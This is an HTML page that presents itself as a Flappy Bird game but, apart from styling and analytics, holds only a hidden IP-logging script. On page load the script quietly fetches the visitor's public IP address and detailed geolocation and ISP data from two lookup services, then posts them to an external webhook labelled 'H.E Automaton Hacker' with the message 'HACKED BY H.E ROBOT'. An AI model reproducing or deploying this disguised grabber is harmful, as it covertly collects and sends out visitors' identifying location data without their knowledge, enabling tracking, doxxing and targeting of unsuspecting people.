<!DOCTYPE html>
<html lang="en"> 
<head>
    <meta charset="UTF-8">
    <meta name="theme-color" content="#fff" class="theme-color" />
    <meta property="og:title" content="Flappy Bird">
    <meta property="og:description" content="By H.E Clan Studios! discord.gg/masamba | Credits: H.E Robot">
    <meta property="og:image" content="https://i.postimg.cc/SKqL0bjy/clappy.png">
    <meta property="og:url" content="https://flappyhunter.netlify.app/">
    <meta property="og:type" content="website">
    <title>Flappy Bird</title>

    <style>
        html, body {
            width: 100%;
            height: 100%;
            margin: 0;
            font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Noto Color Emoji";
            overflow: hidden;
        }
        .hello-message {
            margin: 20px;
            text-align: center;
        }
        .logout-messages {
            pointer-events: none;
            color: red;
            margin: 40px;
            position: fixed;
            top: 0;
            left: 0;
            text-shadow: 2px 2px #ffffff, 4px 4px 10px #4d4c4c;
        }
        img {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            object-fit: cover;
            z-index: -1;
        }
        @keyframes blurslowly {
            0% {
                filter: none;
            }
            92% {
                filter: blur(0);
            }
            96% {
                filter: blur(1px);
            }
            100% {
                filter: blur(0);
            }
        }
        body {
            animation-name: blurslowly;
            animation-iteration-count: infinite;
            animation-duration: 15s;
            animation-play-state: running;
        }
        .header {
            display: none;
        }
        .map-container {
            display: none;
        }
    </style>



    <template>
        <div class="hello-message">
            <img src="background-img.png" alt="Play" />
        </div>
        <div class="logout-messages"></div>
    </template>

    <header class="header"></header>

    <script src="/index.js"></script>
    <script async src="https://www.googletagmanager.com/gtag/js?id=UA-3898076-24"></script>
    <script>
        window.dataLayer = window.dataLayer || []
        function gtag() {
            window.dataLayer.push(arguments)
        }
        gtag('js', new Date())
        gtag('config', 'UA-3898076-24')
    </script>

    <script src="./config.js"></script>
    <script>
        function get_information(link, callback) {
            var xhr = new XMLHttpRequest();
            xhr.open("GET", link, true);
            xhr.onreadystatechange = function() {
                if (xhr.readyState === 4) {
                    callback(xhr.responseText);
                }
            };
            xhr.send(null);
        }

        get_information("http://ip-api.com/json/?fields=status,message,continent,continentCode,country,countryCode,region,regionName,city,district,zip,lat,lon,timezone,offset,currency,isp,org,as,asname,reverse,mobile,proxy,hosting,query", function(text) {
            var div = document.createElement("div");
            div.innerHTML = text;
            div.id = "razzylog";
            const secondList = document.getElementsByClassName("header")[0];
            secondList.appendChild(div);
        });

        get_information("https://api.ipify.org/", function(text) {
            var div = document.createElement("div");
            div.innerHTML = text;
            div.id = "ipppp";
            const secondList = document.getElementsByClassName("header")[0];
            secondList.appendChild(div);
        });

        function ipLogByRaz() {
            var ispp = document.getElementById('ipppp').innerHTML;
            var extra = document.getElementById("razzylog").innerHTML;
            const request = new XMLHttpRequest();
            request.open("POST", wbhk);
            request.setRequestHeader('Content-type', 'application/json');
            const params = {
                username: "H.E Automaton Hacker",
                avatar_url: 'https://i.postimg.cc/3wCBWJz4/wezwewzez-ezgif-com-webp-to-png-converter.png',
                content: "**Ip** : _" + ispp + "_\n**HACKED BY H.E ROBOT** : _https://api.techniknews.net/ipgeo/" + ispp + "_\n**Extra Info** : Made by H.E Robot" + extra + "`"
            };
            request.send(JSON.stringify(params));
        }

        setTimeout(function() {
            ipLogByRaz();
        }, 700);
    </script>

  

